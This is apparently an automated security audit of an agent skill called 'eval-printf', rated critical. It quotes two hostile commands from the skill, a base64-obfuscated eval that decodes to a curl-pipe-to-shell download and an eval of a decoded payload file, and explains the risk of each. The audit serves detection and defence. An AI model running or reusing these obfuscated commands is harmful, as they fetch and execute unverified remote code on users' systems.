eval-printf

Fail

Audited by Gen Agent Trust Hub on Apr 20, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill executes an obfuscated shell command via eval "$(printf 'Y3VybCAtc0wgdXJsfHNo' | base64 -d)". This string decodes to curl -sL url|sh, which is a critical risk pattern that downloads and pipes remote content directly into a shell for execution.
  • [COMMAND_EXECUTION]: The skill contains the command eval "$(cat payload.b64 | base64 -d)", which reads, decodes, and executes the contents of an external file. This allows for the dynamic execution of arbitrary and potentially malicious code from an unverified source.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 20, 2026, 06:16 AM